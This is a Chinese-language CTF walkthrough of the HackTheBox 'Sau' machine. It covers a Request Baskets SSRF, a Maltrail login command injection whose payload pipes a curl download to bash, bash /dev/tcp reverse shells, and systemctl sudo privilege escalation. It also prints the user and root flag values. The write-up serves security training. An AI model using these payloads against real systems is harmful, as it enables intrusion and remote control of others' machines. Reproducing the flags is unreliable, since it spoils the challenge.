hackthebox Sau靶场通关记录 | request baskets漏洞 | maltrail漏洞 | systemctl提权

字数 1257 2025-08-10 17:51:51

HackTheBox Sau靶场渗透测试教学文档

1. 靶场概述

Sau是HackTheBox上的一个中等难度靶机，涉及以下主要漏洞利用链：

Request Baskets服务的SSRF漏洞(CVE-2023-27163)
Maltrail服务的远程命令执行漏洞
Systemctl权限提升漏洞

2. 初始信息收集

2.1 端口扫描

使用nmap进行初始扫描：

nmap -p- --min-rate 5000 10.10.11.224

发现开放端口：

22/tcp - SSH服务
55555/tcp - Web服务

详细扫描：

nmap -p 22,55555 -sC -sV --min-rate 5000 10.10.11.224

2.2 Web服务识别

访问55555端口发现运行Request Baskets服务，版本1.2.1。

3. Request Baskets SSRF漏洞利用(CVE-2023-27163)

3.1 漏洞描述

Request Baskets服务存在API接口：

/api/baskets/{name}
/baskets/{name}

其中forward_url参数存在SSRF漏洞，可用来访问内部服务。

3.2 漏洞利用步骤

创建basket：

POST /api/baskets/rktest HTTP/1.1
Host: 10.10.11.224:55555
Content-Type: application/json
Content-Length: 120

{
    "forward_url": "http://127.0.0.1:80",
    "proxy_response": true,
    "insecure_tls": false,
    "expand_path": true,
    "capacity": 250
}

访问创建的basket触发SSRF：

http://10.10.11.224:55555/rktest

发现内部运行Maltrail服务，版本0.53

4. Maltrail远程命令执行漏洞

4.1 漏洞描述

Maltrail登录页面存在命令注入漏洞，可通过精心构造的username参数执行系统命令。

4.2 漏洞利用步骤

创建新的basket指向Maltrail登录页面：

POST /api/baskets/rktest_2 HTTP/1.1
Host: 10.10.11.224:55555
Content-Type: application/json
Content-Length: 120

{
    "forward_url": "http://127.0.0.1:80/login",
    "proxy_response": true,
    "insecure_tls": false,
    "expand_path": true,
    "capacity": 250
}

发送恶意请求执行命令：

POST /rktest_2 HTTP/1.1
Host: 10.10.11.224:55555
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

username=%3b%60curl+10.10.14.15%2fshell.sh%7cbash%60

准备反弹shell脚本shell.sh：

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.15/12345 0>&1

启动HTTP服务：

python3 -m http.server 80

监听反弹shell：

nc -lvnp 12345

5. 权限提升

5.1 初始信息收集

获取user flag：

/home/puma/user.txt
9d27f073a1321690ac3a83a5ffc270db

检查sudo权限：

sudo -l

输出显示可以无密码运行：

(root) NOPASSWD: /usr/bin/systemctl status trail.service

5.2 Systemctl提权

方法一：通过交互式shell提权

sudo systemctl status trail.service

在交互界面输入：

!sh

方法二：创建恶意service文件（如果允许）

[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.14.15/23456 0>&1 2<&1"
[Install]
WantedBy=multi-user.target

然后执行：

sudo systemctl link /dev/shm/mm.service
sudo systemctl enable --now /dev/shm/mm.service

获取root flag：

/root/root.txt
2c4fa5feb2d7bd0f4d5ca9c23834bddb

6. 漏洞总结

Request Baskets SSRF漏洞(CVE-2023-27163)
- 通过forward_url参数实现SSRF
- 绕过限制访问内部服务
Maltrail命令注入漏洞
- 登录页面username参数未过滤
- 可执行任意系统命令
Systemctl权限提升
- 错误配置sudo权限
- 允许通过systemctl status获取root shell

7. 参考资源

Request Baskets漏洞描述：
https://avd.aliyun.com/detail?id=AVD-2023-27163
Maltrail漏洞详情：
https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/
Systemctl提权方法：
https://gtfobins.github.io/gtfobins/systemctl/
Sau靶场Writeup：
https://techyrick.com/sau-htb-writeup/

HackTheBox Sau靶场渗透测试教学文档 1. 靶场概述 Sau是HackTheBox上的一个中等难度靶机，涉及以下主要漏洞利用链： Request Baskets服务的SSRF漏洞(CVE-2023-27163) Maltrail服务的远程命令执行漏洞 Systemctl权限提升漏洞 2. 初始信息收集 2.1 端口扫描使用nmap进行初始扫描：发现开放端口： 22/tcp - SSH服务 55555/tcp - Web服务详细扫描： 2.2 Web服务识别访问55555端口发现运行Request Baskets服务，版本1.2.1。 3. Request Baskets SSRF漏洞利用(CVE-2023-27163) 3.1 漏洞描述 Request Baskets服务存在API接口： /api/baskets/{name} /baskets/{name} 其中 forward_url 参数存在SSRF漏洞，可用来访问内部服务。 3.2 漏洞利用步骤创建basket：访问创建的basket触发SSRF：发现内部运行Maltrail服务，版本0.53 4. Maltrail远程命令执行漏洞 4.1 漏洞描述 Maltrail登录页面存在命令注入漏洞，可通过精心构造的username参数执行系统命令。 4.2 漏洞利用步骤创建新的basket指向Maltrail登录页面：发送恶意请求执行命令：准备反弹shell脚本shell.sh：启动HTTP服务：监听反弹shell： 5. 权限提升 5.1 初始信息收集获取user flag：检查sudo权限：输出显示可以无密码运行： 5.2 Systemctl提权方法一：通过交互式shell提权在交互界面输入：方法二：创建恶意service文件（如果允许）然后执行：获取root flag： 6. 漏洞总结 Request Baskets SSRF漏洞(CVE-2023-27163) 通过 forward_url 参数实现SSRF 绕过限制访问内部服务 Maltrail命令注入漏洞登录页面username参数未过滤可执行任意系统命令 Systemctl权限提升错误配置sudo权限允许通过systemctl status获取root shell 7. 参考资源 Request Baskets漏洞描述： https://avd.aliyun.com/detail?id=AVD-2023-27163 Maltrail漏洞详情： https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/ Systemctl提权方法： https://gtfobins.github.io/gtfobins/systemctl/ Sau靶场Writeup： https://techyrick.com/sau-htb-writeup/